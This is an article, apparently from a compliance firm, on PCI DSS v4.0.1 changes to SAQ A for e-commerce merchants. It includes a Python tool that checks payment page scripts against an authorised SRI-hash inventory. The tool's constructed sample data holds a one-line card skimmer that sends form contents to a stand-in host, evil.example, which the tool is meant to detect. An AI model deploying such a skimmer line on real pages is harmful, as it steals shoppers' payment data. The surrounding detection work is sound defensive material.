Payment Card Industry Data Security Standard (PCI DSS) v4.0 has been in effect since 1 April 2024, when v3.2.1 was retired. In June 2024 the standard was updated to v4.0.1 following a limited revision; this version added no new requirements and removed none compared with v4.0.
These versions of the standard include requirements that applied immediately from April 2024, such as external vulnerability scanning by an Approved Scanning Vendor (ASV), plus a set of future-dated requirements that were best practice until their implementation date of 31 March 2025. From that date they are mandatory and must be assessed as part of every assessment.
How Have the Requirements for E-commerce Organisations Changed?
For e-commerce environments and entities that are eligible to report compliance to the requirements of SAQ A, the future-dated requirements for SAQ A included:
- 6.4.3 – Payment page scripts that are loaded and executed in the consumer’s browser are authorised and managed.
- 8.3.6 – Passwords/passphrases used as an authentication factor to meet Requirement 8.3.1 must be at least 12 characters long (or at least 8 where the system does not support 12) and contain both numeric and alphabetic characters.
- 11.6.1 – A change- and tamper-detection mechanism is deployed onto payment pages.
- 12.3.1 – A targeted risk analysis is completed to support requirement 11.6.1, i.e. to justify how often the change- and tamper-detection checks on the payment pages are run.
On 30 January 2025, in response to stakeholder feedback, the PCI Security Standards Council (PCI SSC) announced that requirements 6.4.3, 11.6.1 and 12.3.1 will be removed from the SAQ A reporting template with effect from 31 March 2025 (the date on which the remaining future-dated requirements become mandatory).
Note that if your compliance date falls before 31 March 2025, the SAQ A reporting template will still contain these three requirements. If they are not yet in place they can be marked as ‘not applicable’ without any detrimental effect on your assessment outcome. Requirement 8.3.6 remains in SAQ A and becomes mandatory on 31 March 2025 as planned.
New Eligibility Criterion in the SAQ A Reporting Template
Also from 31 March 2025, and in place of the removed requirements, an additional eligibility criterion has been added to the SAQ A reporting template: merchants must “confirm their site is not susceptible to attacks from scripts that could affect the merchant’s e-commerce system(s).” So although the specific requirements have been removed, you will still need to show that your e-commerce sites (and the payment pages in particular) meet the intent of those requirements: the scripts that load on the payment page are known and authorised, and unauthorised changes to the page or its scripts would be detected. If you have already started implementing 6.4.3 and 11.6.1, we recommend you continue, because that work is exactly what evidences the new eligibility criterion.
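As an added example (not code from the PCI SSC or from this page's author), the check below shows what "scripts are authorised and managed" and "change- and tamper-detection" look like in practice. It parses a payment page, compares every `<script>` with an authorised inventory of script URLs and their known-good Subresource Integrity (SRI) hashes, and flags scripts that are not in the inventory, that lack an `integrity` attribute, or whose content as currently served no longer matches the approved hash. The page, the script bodies, the hostnames (`psp.example`, `cdn.example`, `static.example`, `evil.example`) and the inventory are all constructed for the example so it runs offline; a real deployment would fetch the live page and scripts on the schedule set by your targeted risk analysis.

```python
"""Script inventory and tamper check for a payment page (constructed example)."""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    digest = hashlib.sha384(content).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


class _ScriptCollector(HTMLParser):
    """Collects every <script> element on a page, external or inline."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # dicts: src (None if inline), integrity, body
        self._inline = False     # inside an inline <script> body?
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append({"src": a["src"], "integrity": a.get("integrity"), "body": None})
        else:
            self._inline, self._buf = True, []

    def handle_data(self, data):
        if self._inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._inline:
            body = "".join(self._buf).strip().encode("utf-8")
            self.scripts.append({"src": None, "integrity": None, "body": body})
            self._inline = False


def extract_scripts(html: str):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def audit_payment_page(html, authorised, authorised_inline, served):
    """Compare the page's scripts with the authorised inventory.

    authorised:        {src: expected SRI hash}  (the approved script inventory)
    authorised_inline: set of SRI hashes of approved inline script bodies
    served:            {src: bytes fetched on this run} (what a browser would execute)
    Returns (finding, identifier) tuples in page order; an empty list is a clean page.
    """
    findings = []
    for s in extract_scripts(html):
        if s["src"] is None:
            h = sri_hash(s["body"])
            if h not in authorised_inline:
                findings.append(("unauthorised-inline-script", h))
            continue
        src = s["src"]
        expected = authorised.get(src)
        if expected is None:
            findings.append(("unauthorised-script", src))
            continue
        if s["integrity"] is None:
            findings.append(("missing-integrity", src))          # browser cannot enforce SRI
        elif s["integrity"] != expected:
            findings.append(("integrity-attribute-changed", src))
        body = served.get(src)
        if body is None:
            findings.append(("script-not-retrievable", src))
        elif sri_hash(body) != expected:
            findings.append(("script-content-changed", src))     # tamper signal
    return findings


# Constructed sample data: not real merchant, PSP or CDN content.
PSP_JS = b"window.psp={tokenise:function(card){/* ... */}};"
ANALYTICS_JS = b"console.log('analytics');"
INLINE_JS = b"psp.init({merchant:'demo'});"
SKIMMER_JS = b"new Image().src='https://evil.example/c?d='+encodeURIComponent(document.forms[0].innerHTML);"

AUTHORISED = {  # approved payment page scripts and their known-good hashes
    "https://psp.example/checkout.js": sri_hash(PSP_JS),
    "https://cdn.example/analytics.js": sri_hash(ANALYTICS_JS),
}
AUTHORISED_INLINE = {sri_hash(INLINE_JS)}

PAYMENT_PAGE = f"""<html><body><form id="card"></form>
<script src="https://psp.example/checkout.js" integrity="{AUTHORISED['https://psp.example/checkout.js']}" crossorigin="anonymous"></script>
<script src="https://cdn.example/analytics.js"></script>
<script src="https://static.example/extra.js"></script>
<script>{INLINE_JS.decode()}</script>
</body></html>"""

# What each URL returned on this monitoring run: analytics.js has had a
# skimmer appended, and extra.js was never in the inventory.
SERVED_NOW = {
    "https://psp.example/checkout.js": PSP_JS,
    "https://cdn.example/analytics.js": ANALYTICS_JS + SKIMMER_JS,
    "https://static.example/extra.js": b"// not in the inventory",
}

if __name__ == "__main__":
    for finding, ident in audit_payment_page(PAYMENT_PAGE, AUTHORISED, AUTHORISED_INLINE, SERVED_NOW):
        print(f"{finding}: {ident}")
```

Two caveats for anyone turning this into a control. First, a monitor only sees what is served to the monitor; skimmers are routinely configured to serve clean content to known scanner addresses, so run the check from the same vantage point as customers and complement it with browser-side enforcement (SRI attributes plus a Content-Security-Policy `script-src` allowlist). Second, SRI cannot pin a script whose provider legitimately changes it, so every authorised change should update the inventory through your change-control process rather than by silently re-baselining.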
You can find more information in the full announcement released by the PCI SSC.
To discuss how these changes may affect your PCI DSS compliance going forward, please get in touch with our team.